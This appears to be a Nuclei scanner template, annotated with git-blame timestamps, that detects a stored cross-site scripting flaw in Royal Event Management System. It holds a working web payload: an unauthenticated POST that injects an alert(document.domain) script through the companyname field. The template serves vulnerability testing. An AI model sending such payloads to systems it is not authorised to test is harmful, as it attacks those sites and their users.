2022-06-23 18:45:44 +00:00
id : royalevent-stored-xss
2022-06-23 07:30:43 +00:00
info :
2022-09-23 17:53:08 +00:00
name : Royal Event Management System - Stored Cross-Site Scripting
2022-06-23 07:30:43 +00:00
author : ritikchaddha
severity : high
description : |
2022-09-23 17:53:08 +00:00
Royal Event Management System contains a stored cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-06-23 07:30:43 +00:00
reference :
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-06-23 18:40:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-06-23 18:40:24 +00:00
verified : true
2022-08-27 04:41:18 +00:00
tags : xss,unauthenticated,cms,royalevent,packetstorm
2022-06-23 07:30:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-23 07:30:43 +00:00
- raw :
- |
POST /royal_event/companyprofile.php HTTP/1.1
Host : {{Hostname}}
companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
matchers-condition : and
matchers :
- type : word
words :
2022-06-23 18:40:24 +00:00
- 'value="><script>alert(document.domain)</script>" >'
2022-06-23 07:30:43 +00:00
- type : status
status :
- 302
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23
